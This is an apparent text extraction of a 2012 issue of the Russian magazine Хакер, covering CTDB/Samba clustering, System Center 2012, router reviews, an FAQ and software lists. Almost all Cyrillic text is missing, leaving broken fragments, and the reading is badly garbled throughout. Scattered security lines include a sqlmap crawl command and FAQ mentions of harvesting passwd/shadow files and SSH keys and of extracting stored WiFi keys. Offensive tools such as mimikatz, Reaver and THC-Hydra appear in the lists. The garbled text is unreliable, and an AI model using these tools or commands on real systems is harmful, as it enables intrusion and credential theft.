# Samba CTDB
CTDB_MANAGES_SAMBA=yes
# CTDB-
CTDB_NODES=/etc/ctdb/nodes
#
CTDB_LOGFILE=/var/log/log.ctdb
/etc/ctdb/nodes IP Samba, :
192.168.0.1/24
192.168.0.2/24
/etc/ctdb/public_addresses
IP-:
, .
IP-, .
.
, CTDB
IP- , ,
.
. CTDB
:
# /etc/init.d/ctdb start
, ctdb status
- :
OK (THIS NODE)

,

126
0126
CTDB:
# ctdb ping -n all
response from 0 time=0.000064 sec
response from 1 time=0.000087 sec
(3 clients)
(9 clients)
Samba:
# /etc/init.d/samba start
, .
Windows- ,
. UNIX . ,
IP-, /etc/ctdb/public_addresses:
# mount -t cifs //192.168.0.3/public \
/mnt/samba -o user=
# smbclient //192.168.0.4/public
, , ,
, .
192.168.0.3/24
192.168.0.4/24
Number of nodes:2
pnn:0 192.168.0.1
pnn:1 192.168.0.2
OK
Generation:1362679229
Size:2
hash:0 lmaster:0
hash:1 lmaster:1
Recovery mode:NORMAL (0)
Recovery master:0
, .
,
, , ,
. ?
, .
?
DRBD-, master/master
. , .
, ,
OCFS2.
(fencing),

,
. (, , ).
CTDB, .
, ,
.
UNHEALTHY DISCONNECTED, IP-
TCP- . ,
, .
CIFS ,
. ?
04
04 /159/
/159/ 2012
2012
INFO

,

lustre
GlusterFS.
WARNING
Samba
,
.
DRBD
- . -
-
( , UPS ), .
. ,
.

:
# drbdadm create-md r0
# drbdadm attach r0
,
CTDB:
# mount /dev/drbd0
# /etc/init.d/ctdb restart
# /etc/init.d/samba restart

, , , monit.
][ ,
. ,
CTDB /etc/ctdb/notify.sh,
,
, CTDB-.
, , :
# vi /etc/ctdb/notify.sh
event="$1"
shift
case $event in
unhealthy)
04
04 /159/
/159/ 2012
2012
OCFS2
mail foo@bar -s "`hostname` is UNHEALTHY" ...

;;
healthy)
mail foo@bar -s "`hostname` is HEALTHY" ...
;;
esac
CTDB ctdb status.

, :
OK ;
DISCONNECTED ;
DISABLED , ;
UNHEALTHY ,
, CTDB ;
BANNED - ,
CTDB;
STOPPED , ;
PARTIALLYONLINE ,
.
Recovery mode, . :
vNORMAL .
RECOVERY ,
.

ctdb disable ctdb enable.

. ,
, . z
127
0127
SYN/ACK
SYN/ACK
IT-
MICROSOFT:

2012
128
(grinder@synack.ru)
Microsoft
.

System Center,
.
, RC ,
RTM,
.
04 /159/ 2012
SCCM 2012 Central Administration Site
SYSTEM CENTER CONFIGURATION MANAGER 2012

, , ,
System Configuration. : Configuration Manager, Operations Manager, Service
Manager, Data Protection Manager (DPM), Virtual Machine Manager
(VMM), Orchestrator Endpoint Protection
( Forefront EP) AppController.
SCCM 2012 ( v.Next),
-
, , ,
. .
SCCM 2012 , 64- , Win2k8/R2
MSSQL2k8SP1 (x64) . (DP,
Distribution Point) - 86 Win. , SCCM
. SCCM 2007 SCCM 2012 (Migration Migration Jobs),
, . ,
, ,
, . ,
, ,
. ,
, ,
, ,
,
. ,
, .
SCCM2012 USMT (User State Migration Toolkit).
OSD (Operating System Deployment)
SCCM,
( )
, WIM. PXE
DP. Intel vPro/AMT
, .
, - Primary Site,

. Central Administration
Site (CAS, Central Primary Site),
.
04 /159/ 2012
SCCM 2012

(AI, Software Update Point, RSP SHV). ,
CAS (Primary) ,
Primary.
Secondary Site SQL- ( Express). Native Mixed ,
HTTP / HTTPS, ,
Distribution Point.
. Management
Point . , ,
Primary ,
, . Reporting
Point Reporting Services Point SQL
Reporting Services,
. Branch DP , SCCM 2012
BrachCache. SCCM 2012 , UCM (User Centric Management), ,

(, ).
, , .
,
,
. ,

. ,
, ,
, ,
. ,
.
(Required Available),
(, , App-V, Windows Mobile
CAB), . Available -

INTEL VPRO/AMT
,

129
SYN\ACK
SYN/ACK
SCCM 2012
Software Center,
. ,
( ,
), -. ,
, .
Monitoring, Status Message
Viewer, SCCM2007. Client Custom
Settings ,
.
,
.
Role-Based
Access Control (RBAC), , . Security Roles 13
, , - . ,
, , Security
Scope, , . SCCM
2012 MS Office, Wunderbar, , MMC. ,
,
. ,
Client Health
(ccmeval.exe),
.
SCCM 2012 SC AppController, Concero (. ),
SaaS , Windows Server, Hyper-V Virtual Machine Manager 2012,
Windows Azure. VM, ,
Windows Azure, VHD-.
SYSTEM CENTER OPERATIONS MANAGER 2012

OpsMgr
,

AVICode. , , ,
VLAN ( ).
SNMPv3, IPv4/IPv6, , HSRP .
OpsMgr , Root Management Server , Management Server.
OpsMgr 2012
130
SCCM 2012 *nix-
.
RMS Emulator. ,
,
Health Service
(Resource Pool) Management Server. ,
.
Failover Cluster Failover Cluster.
: AD Assignment Resource Pool,
Notifications Resource Pool All Management Servers Resource Pool,
.
( Root MS
) .
, - , . Windows, OpsMgr 2012 Linux *nix.
(Management Pack)
: Apache Tomcat, IBM WebSphere, Java EE, Oracle
WebLogic, Red Hat JBoss . , .NET J2EE Windows Azure.
PowerShell ( SCOM/
SC) *nix-.
, :
PS> Get-Command -Module OperationsManager
UNIX/Linux Shell Command Template

, , ,
OpsMgr.
OpsMgr 2007
. , RC
.
MICROSOFT DEPLOYMENT TOOLKIT 2012

MDT SCCM 2012
AD, DaRT (Diagnostic and Repair Toolkit,
Desktop Optimization Pack).
MDT2012 SCCM
2012 ( SCCM2007)
(, ). , MDT ,
.
Task Sequences: Deploy to VHD Client Task Sequence Deploy to VHD
04 /159/ 2012
INFO

SCCM2007 ][
08.09/09.09/01.10.

SCOM
2007 ][
08.11.

FEP
2007 ]
[ 09.11.

MDT 2010 ][
10.09.
WWW
SCCM
2012: clck.ru/eN3T.
MDT 2012:
microsoft.com/mdt.
SC Endpoint Protection 2012
Server Task Sequence ( VDI, ).

, MDT 2010
P2V , Sysinternal Disk2VHD ( TechNet
clck.ru/fQOp),
. ,
. ,
MDT 2012 Win8.
MDT_FOLDER/Scripts/UDIWizard_Config.
xml UDI Designer (User-Driven Installation,
MTD2010 Update 1) .
: New Computer,
Refresh Replace.
. , (
TechNet ).
Lite Touch, ,
WinRE. PowerShell.
WinXP Win2k3 .
MS SQL SERVER 2012 (DENALI)

, SQL Server 2012, .
04 /159/ 2012
,
. , .
, CTP- 100 000 , .
, .
Win2k8R2
Server Core: SQL- .
: Upgrade Advisor, Distributed Replay Migration Assistant
(SSMA). (Availability
Groups) HADR (High-Availability and Disaster Recovery)
SQL Server
.
, , ,
.
(SQL
Server Multi-Subnet Clustering).
Data Quality Services.

. Power View (Crescent) -
131
SYN\ACK
SYN/ACK
AppController

BISM
(Business Intelligence Semantic Model).
- BISM UDM
PowerPivot.
: IFilter, NEAR, .

, SHA2 256/512. SQL
Express LocalDB , .
, AppController
, : SCVMM, SSP (Virtual Machine Manager Self-Service Portal
Solution Accelerator), DDTK (Dynamic Datacenter Toolkit)
Azure Platform. AppController

, , , . ,
, - .
-,
( ) .
APPCONTROLLER 2012
AppController 2012 System
Center, ( ),
. Azure.
, , .
. z
SYSTEM CENTER 2012

System Center 2012 ( clck.ru/ePUN),

private cloud.

. ,
, .
.
2 CPU.
: System Center 2012 Standard Datacenter, .
132
(
), .

SQL Server, -
.
,
, .
- ,
System Center Client
ML Suite, Service Manager, Operations
Manager, Data Protection Manager Orchestrator.
04 /159/ 2012
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
FERRUM
,

.
,
. . ,
, !

.
. , . Windows, Microsoft Windows Server 2008 R2 Standard,
Microsoft Windows 7 Ultimate x64.
Ixia,
(endpoints, , )
Ixchariot. Ixchariot ,
134
throughput, .
.
:
1) PPTP. Microsoft
Windows Server 2008 R2 Standard PPTP-,

WAN-. LAN- .
2) NAT.
, Static IP.
3) Wi-Fi. LAN-
, . , , . WPA2-PSK AES.
,
WiFi-: ASUS USB-N53, D-Link DWA-160, TP-Link TLWN821N ZyXEL NWD2205 EE.
ASUS USB-N53.
04 /159/ 2012
ASUS RT-N66U
, , , ASUS RT-N66U. ,
. ASUS ASUS RT-N56U
,
,
, ,
. , ASUS RTN56U .
ASUS RT-N66U ,
.
USB,
. ASUS RTN66U
: ,
PPTP.
,
, 100 /, ASUS RT-N66U
. , Dual Access,
.
04 /159/ 2012
135
FERRUM
D-LINK DSR-500N

D-Link DSR-500N

.
, WAN-
. D-Link DSR-500N
USB- Wi-Fi (
),
. , ,
,
, ,
.
D-Link DSR-500N
D-Link.
, Wi-Fi.
, ,
, D-Link
DSR-500N.
, . , D-Link ,
. ,
PPTP Wi-Fi
.
8000
.
NETGEAR WNDR4000
, , ,
? , NETGEAR WNDR4000. ,
. , , NETGEAR
.
.
PPTP NAT. . NETGEAR
WNDR4000 USB-, . ,
.
:
Wi-Fi:
:
:
:
:
:
136
ASUS RT-N66U
1x WAN (RJ-45) 10/100/1000 /, 4x

LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
NAT, DynDNS, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
EZSetup, WPS, - UPnP,
AiDisk, 2x USB
6000
.
D-Link DSR-500N
2x WAN (RJ-45) 10/100/1000 /, 4x LAN

(RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, Static Routing, DHCP, QoS
WPS, 1x USB, ,
Green
NETGEAR
WNDR4000
1x WAN (RJ-45) 10/100/1000 /, 4x LAN

(RJ-45) 10/100/1000 /
IEEE 802.11 a/b/g/n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, IPTV, Static Routing, DHCP, QoS
: WPS, , 1x USB
04 /159/ 2012
ZYXEL KEENETIC GIGA

ZyXEL , ,
Dial-Up. .
ZyXEL Keenetic Giga.
Keenetic
USB , , . -
, 3G/4G- Wi-Fi. Keenetic Giga
.
, 99.9%,
- , -, IPTV-.
- . ,
, .
, . ,
NAT , PPTP .
.
3300
.
TP-LINK TL-WR1043ND
,
. TP-Link TL-WR1043ND
,
USB-. . , :

?
, TP-Link TL-WR1043ND , ,
. ,
(,
USB-),
. ,
,
.
.
2000
.
TP-Link TLWR1043ND
1x WAN (RJ-45) 10/100/1000 /,

4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11a/b/g/n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
: WPS, 1x USB
04 /159/ 2012
ZyXEL Keenetic
Giga
1x WAN (RJ-45) 10/100/1000 /,

4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
WPS, TVport, 2x USB
, ,
. ASUS RT-N66U,

,
. ASUS RT-N66U
.
ZyXEL
Keenetic GIGA . NETGEAR WNDR4000 ,
. TPLink ,
. z
137
FERRUM
WI-FI, 1 , /
ASUS RT-N66U
D-Link DSR-500N
NETGEAR WNDR4000
TP-Link TL-WR1043ND
ZyXEL Keenetic GIGA
FDX
Downstream
Upstream
10
20
30
40
50
60
70
80
90
100
110
120
130
140
5 . 2.4 , ASUS RT-N66U
PPTP, /
NAT, /
ASUS RT-N66U
ASUS RT-N66U
D-Link DSR-500N
D-Link DSR-500N
NETGEAR WNDR4000
NETGEAR WNDR4000
TP-Link TL-WR1043ND
TP-Link TL-WR1043ND
ZyXEL Keenetic GIGA
ZyXEL Keenetic GIGA
FDX
Downstream
Upstream
50 100 150 200 250 300
ASUS RT-N66U Netgear WNDR4000
FDX
Downstream
Upstream
500
1000
1500
D-Link DSR-500N NAT
WI-FI, 6 , /
ASUS RT-N66U
D-Link DSR-500N
NETGEAR WNDR4000
TP-Link TL-WR1043ND
ZyXEL Keenetic GIGA
FDX
Downstream
Upstream
10
20
30
40
50
60
70
80
90
138
04 /159/ 2012
FERRUM
EDIFIER
MP15 PLUS
:
: 1.22

: 100-20000
:
: 40
: 6
:
450
: 10
:
, /
,
,
: 3.5
,
SD-, FM-
: 2006033
: 0.2
04 /159/ 2012
: ,
, .
- ,
, . .
, - . -
, ,
. , Hi-End
, ?
Edifier.
Edifier MP15 Plus Edifier Audio Candy Plus .
, .
. ,
, .
, USB.
FM- SD- .
,
. ,
,
. , ,
. -
1200
.
,
.

, EdifierMP15 Plus .
, 200 .

.
EdifierMP15 Plus ,
. , , .

. ,
. , lossless- ,
MP3. Toshiba Satellite L635-12Q iPod nano 5G.

, Edifier MP15
Plus
. ? ,
, .
-,
.
, Edifier MP15 Plus
. z
139
UNITS / FAQ UNITED
FAQ United

FAQ@REAL.XAKEP.RU
Windows 8 Consumer
Preview, Microsoft

. ,
.
,
Microsoft,
Metro-?

A ViStart (lee-soft.com/vistart),

Windows XP,
Vista/
Windows 7.
. ,

,
,
.
: bit.ly/w7gsxv.
, Windows 8
Q Metro, ?
1. .
C:\Users\<User Profile>\
AppData\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup , explorer.
exe shell:::{3080F90D-D7AD-11D9-BD980000947B0257}.
2. .
Win-R
taskschd.msc. , Create task.
,
,
(Triggers New), Begin the task: At
log on
(Delay task for: 5 seconds). (Action:
Start a program)
explorer.exe shell:::{3080F90DD7AD-11D9-BD98-0000947B0257}.

Jabber-.
,
. -
,
?

XMPP-,
, , Python. Twisted Words
(twistedmatrix.com/trac/wiki/TwistedWords),
Wokkel (wokkel.ik.nu), SleekXMPP (code.
google.com/p/sleekxmpp) , ,
, .

IMified (imified.com),
HTTP
API.

?
Windows.

,
. , WiFi HotSpot Creator
(wifihotspotcreator.com) .
SSID, WPA2

,
.

,
. ?
A:

Jabber. -,
JS- ?

,
, .
, , Android iOS
Firebug
( Firefox) Web Inspector (
WebKit-), JS-.

140
-
DOM- , , ,
(
, ) . ,
, ,
.
.
,
Adobe.
weinre
(phonegap.github.com/weinre), FireBug Web
Inspector,

, ,
.
,
, , , . Android, iOS, BlackBerry, webOS.
04 /159/ 2012
FAQ UNITED

SSL- (
GTalk ,
HTTPS).
-,
OTR (Off-theRecord).
. :

;
, ;

,
;

,
- .

SPDY,
GOOGLE,
?
SPDY ( )

, Google
HTTP.
, ( )
.
Google
Chrome Firefox,
HTTP-
Google (, Gmail),
Twitter.
90- HTTP
-,
.
TCP-,

,

, .
OTR (
) Adium, Pidgin, Kopete,
Miranda IM, Trillian, qutIM, Psi+ .
JavaScript HTML- , ,
( -,
)?
, JavaScript-,
,
(
) ,
. .
, JS-
, Malzilla (malzilla.sourceforge.
net).
,
() .
Adobe
Adobe Lab Adobe Shadow (labs.
adobe.com/technologies/shadow).

( Chrome)
( pairing).

, , .
04 /159/ 2012
SPDY
50%
(
TCP).
HTTP- ,
,
( ,
User-Agent),

, .
Google (chromium.org/spdy/
spdy-whitepaper), ,
SPDY.
-,
SPDY.
Apache (code.
google.com/p/mod-spdy),
Python (github.com/mnot/nbhttp/
tree/spdy). Chrome, ,
(bit.ly/xldeGj),
,
HTTP
SPDY.
Chrome ( , : chrome://net-internals) SPDY.
JavaScript-
(jsconsole.com) ,

.
.
.
(jsconsole.com/remote-debugging.
html) , .
JavaScript
RemoteJS (bit.ly/wF63OE).
:
GUU-, Python . ,
Android.
Sencha ,
HTML5.
141
UNITS / FAQ UNITED

(, aircrack-ng) Android?
xda-developers.
A com,

,
,
Android
airodump aircrack-ng (, bit.ly/
znrtiB). , -,
, -,
.

, DroidSheep
(droidsheep.de) Shark for Root (bit.ly/
wpexhA). , , ARP
Spoofing (, ).
PCAP-,
, ,
Wireshark.

,
?
VMware :
snapshot,
,
.vmem
. VirtualBox
.
1.
:
VirtualBox --dbg --startvm <VM name>
2. Debug
Command line....
3.
.pgmphystofile <filename>, ,
dump.
Volatility (code.google.com/p/volatility).
Passware
(lostpassword.com/kit-forensic.htm),
.
,

. -
,
?
,
.

, .
, ASUS WL-500gP
,
(wl500g.info). , ,
OpenWRT (
telnet)

firmware (
, reset settings
,
192.168.1.1
ftp). ,

nvram. ,
, nvram
show. , , .
:
Linux, .

Linux- ,
.
, ,
.
Intersect, Python. , ,
.
(passwd,
shadow, gshadow, master.passwd),
SSH- ( ),
,
Bash ,

,
.
.

,
Windows-?

WirelessKeyView
(nirsoft.net/utils/wireless_key.html),
. . Windows
Wireless Zero Configuration (,
)
.
, :
netsh wlan show profiles
,
:
netsh wlan export profile name="<
>"
XML-,

,
(, ).
? -,

!
netsh wlan add profile filename="<
.xml"
Weinre FireBug Web Inspector,
142
.

,
, . , ,
! ,
:). z
04 /159/ 2012
>Net
AutoPuTTY 0.24.2
Awasu 3.0
Cookienator 2.6.41
CrossLoop 2.82
Fiddler 2.3.9.3
Lanshark 0.0.2
Lunascape 6.6.0
mRemote 1.50
NetWorx 5.2.2
Omea Reader 2.2
Psi 0.14
>Multimedia
1by1 1.75
Audacity 1.3.14
AutoBrake 1.07
CamSpace 8.95
Capture2Text 1.10
Format Factory 2.90
Free Audio Editor 2012
mpTrim 2.13
music2pc 2.12
Picasa 3.9
SkypeAutoRecorder
Songr 1.9.33
TagScanner 5.1.610
Tunatic 1.0.1b
VideoInspector 2.3.0.126
VLC 2.0
>Misc
Aard Dictionary 0.9.3
AllDup 3.4.0
DisplayFusion 3.4.1
Evernote 4.5.3.6131
Everything 1.2.1.371
FilePro 1.0
HoeKey 1.13
HotKey Resolution Changer 1.5
LastPass 1.90
Process Blocker 0.7b
PyCmd 0.8
RegScanner 1.85
StExBar 1.8.3
Synergy 1.3.8
timeEdition 1.1.6
Workrave 1.9.4
>>WINDOWS
>Development
Dependency Walker 2.2
DJ Java Decompiler 3.12.12.96
Free JavaScript Editor 4.7
Frhed 1.6.0
HxD 1.7.7.0
KompoZer 0.8b3
Microsoft Visual Studio 11 Beta
NSIS 2.46
PHP 5.4.0
py2exe 0.6.9
RapidSVN 0.12
RubyMine 4.0
SWI-Prolog 6.0.1
TextPad 5.4.2
TortoiseSVN 1.7.5
Xdebug 2.1.3
>>UNIX
>Desktop
Bib2xhtml 3.0
Blender 2.62
Brl-cad 7.20.4
Ccextractor 0.60
Cdcat 1.8
Cdemu 1.5.0
Cinnamon 1.2
Libreoffice 3.5.0.3
Libvpx 1.0.0
Macrofusion 0.7.3
Mapsurfing
Mathomatic 15.8.0
Openshot 1.4.2
Pinta 1.1
Spacefm 0.7.0
Vlc 2.0.0
Windowmaker 0.95.2
Zile 2.4.6
>System
ClipboardZanager 1.0
CPU-M Benchmark 1.0
DHE Drive Info 3.2.493
Disk Bench 2.6.2.0
Disk Investigator 1.31
DriverIdentifier 3.9
DSynchronize 2.30.2
File Extension Monitor 1.4
MouseWrangler 1.0.2
NTFS Permissions Reporter 1.0.0
Process Explorer 15.13
Simple Data Backup 7.0
Startup Master
System Ninja 2.3.1.0
USB Oblivion 1.7.0.0
Windows Surface Scanner 2.20
>Security
AJAX Crawling Tool
BFT - Browser forensic tool
Browser Forensic Tool
Browzar 2.0
codesensor
CodeSensor 0.1
DPScan
FuzzOps-NG
Fuzzware 1.5
Heimdal
IronWASP
MagicTree 1.1
mimikatz 1.0
Nessus 5.0
PEBrowse Professional 10.1.4
SIPVicious 0.2.7
uniofuzz
Uniofuzz 0.1.2
untidy
untidy beta 2
Spiffy 0.5.11
The Dude 3.6
TightVNC 2.0.4
UltraSurf 11.04
Wuala
>Security
Afick 2.20
AlienVault
Bluelog 1.0.2
codesensor
DotDotPwn 3.0
DPScan
FuzzOps-NG
Fwknop 2.0
Gnupg 2.0.18
Heimdal
Nessus 5.0
Netifera 1.0
Reaver 1.4
Samhain 3.0.2
sipvicious 0.2.7
THC-HYDRA v7.2
Tor 0.2.2.35
Trupax 6
uniofuzz
untidy
Vpnd 1.1.4
WeBaCoo 0.2.2
zzuf 0.13
>Net
Ajaxplorer 4.0.3
Bitlbee 3.0.5
Chrome 17.0.963
Dxirc 1.00.0
Gfeedline 1.0
Gnubiff 2.2.14
Leechraft 0.5.0
Liferea 1.8.0
Nat-traverse 0.5
Pcapsipdump 0.2
Qtm 1.3.7
Rdp-runner 0.1.17
Sflphone 1.0.2
Spgt 0.7.1
Tomuss 3.1.7
Uhub 0.3.2
W3perl 3.141
Yate 4.0.0
>Devel
Anjuta 3.2.2
Execline 1.1.3
Highlight 3.7
Kotlin 0.1.429
Lgi 3.4.0
Libpki 0.6.7
Libpng 1.5.9
Lrc 0.7
Lua 5.2.0
Mahout 0.6
Mono 2.10.8
Netty 3.3.1
Opentbs 1.7.5
Panda3d 1.8.0
Parrot 4.0.0
Rails 3.2
Sabredav 1.5.7
Ujorm 1.22
Wro4j 1.4.4
>>MAC
Cathode 1.2.0
Docker 1.6.7
Gruml 1.1
HyperDock 1.2
iZip Archiver 1.4
KeyRemap4MacBook 7.5.0
Mouse Server 2.6.9
Notify 2.1
Prey 0.5.3
Private Eye 1.0
Que 1.3.1
RCDefaultApp 2.1
Resuminator 1.0
Syrinx 2.5.0
Tunatic 1.1
VLC 2.0
WhatRoute 1.10.7
>X-distr
CentOS 5.8
>System
Alsa 1.0.25
Bcfg2 1.2.1
Clonezilla 1.2.12-10
Fuse-exfat 0.9.6
Kccmp 0.3
Limitcpu 1.5
Mesa 8.0
Mondorescue 3.0.0
Nvidia 295.20
Pf-kernel 3.2.5
Procmeter3 3.6
Quotatool 1.4.12
Rally 0.5.5
Spacewalk 1.6
Wayland 0.85.0
>Server
Apache 2.2.22
Asterisk 10.1.3
Bind 9.8.1-p1
Cups 1.5.2
Dhcp 4.2.3-p2
Dovecot 2.1.1
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.21
Nsd 3.2.10
Openldap 2.4.29
Openvpn 2.2.2
Postfix 2.9.1
Postgresql 9.1.2
Pure-ftpd 1.0.35
Samba 3.6.3
Sendmail 8.14.5
Snort 2.9.2.1
Sqlite 3.7.10
Squid 3.1.19
Syslog-ng 3.3.4
Vsftpd 2.3.5
04(159) 2012

|ipnjr_qgordkpgpqdkr
mqj_ciggqo_ppgomaig
!30.%4

3()-%.').%lmazh
pnmpm`aldcodlg~imc_
g_aqmf_borfig

_jdip_lco
b_jguigh
gledldo
`gfldpkdl
gladpqmo

536&$3:15
mn_plzh
camhlgi

8889",&136

"/%30*%

odimkdlcma_ll_~
$UCK$UCK'O
'OOGLE

UNITS / WWW2
WWW2
VOX.IO
vox.io
, Skype', , . Vox.io
-
, . vox.
io- , , ,
. ,
, iOS.
Skype
XMARKS
xmarks.com
:
? Xmarks (Firefox, Chrome, Internet Explorer Safari),
. (12$ ),
. , :
,
LastPass.

LOADS.IN
loads.in

-, . , .
, . loads.in .

: Firefox, Chrome, Safari, Internet Explorer.
,
- .

DIAGRAMLY
Diagram.ly
- ,
Microsoft Visio. . ,
, - . Diagramly must have ,
,
. -, , ,
Diagramly 70 .

144
04 /159/ 2012

Хакер 2012 04 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2012 04 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

ANDROID

20 ( ) Google Chrome 17.0.963.46.

BUG BOUNTY: Google 410 . .

./sqlmap.py -u http://url/ --crawl=5

MICROSOFT STORE EVIL SHADOW TEAM. , .

MAC OS X 10.8 Mountain Lion ( ) 2012 .

GOOGLE CHROME BETA ANDROID 4- . , flash.

INTEL Core i5-2380P, i52450P i5-2550K Sandy Bridge.

box add < >

mimikatz 1.0 x86 (pre-alpha)

Sanjar Satsura (sanjar@xakep.ru, twitter.com/sanjar_satsura)

, cer.cer cer(faked by collision).cer

1993 PCMCIA- Wi-Fi, 4 /c. Interop .

: Python, Ruby ( Ruby on Rails)

Ruby Ruby on Rails

THE INTRO TO RAILS SCREENCAST I

RAILS FOR ZOMBIES

, , , WinSwitch . , Ubuntu Natty Narwhal

echo "deb http://winswitch.org/ natty main" > /etc/apt/

Service ant-vb (/services/udisks.service) successfully

GreenDog , Digital Security (twitter.com/antyurin)

DNS ZONE TRANSFER

. , HD Moore. DNS- TLD (top-level-domain: .net,

Zone transfer .arpa

zone transfer. , 65 312 TLD

foo.htm.en foo.htm.de, /foo.htm ,

GET /foo HTTP/1.1

GET /foo HTTP/1.1

HTTP/1.1 406 Not Acceptable

NEED FOR SPEED: THE RUN

.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block

.text:6FFBEA44 mov eax, [esi]

Adobe Flash Player:

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008

Adobe Flash Player <= 10.3.181.36

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

2. XSS setup-config.php. Javascript-

L.M.N.O user pass.

Music Store SQL-

DWORD * offset_table=(DWORD *)(mra_base +

RICH TEXT FORMAT (RTF)

<input type=button value='' name=show_orders_list

elf (icq: 7719116)

SECUROM V7 VIRTUAL MACHINE

STOS DWORD PTR ES:[EDI]

DWORD PTR DS:[EBX+0C],EDX

DWORD PTR SS:[EBP+8]

GetModuleFileNameA, DeleteFileA, GlobalFree.

DEC DWORD PTR DS:[158297A]

BVScanner (Black Vlastelin Scanner)

IoCreateDevice DrWeb, TdiRegisterDeviceObject tdi.sys

NDIS- Comodo () OutPost FireWall Pro 7.0 ()

BHO Internet Explorer

( UPX) lpe, pdf,

Kaspersky : total detection

Avira Free Antivirus

eax, large fs:18h ; TEB

xref SdbResolveDatabase, DatabasePath

KEY_WRITE, NULL, &key, NULL);

Johnny Catch (johnny.catch@gmail.com)

MS VS 2008 SP1). 16-

include BelT (#include "Belt.h"). Crypto.h

init, , instances , list_instances ,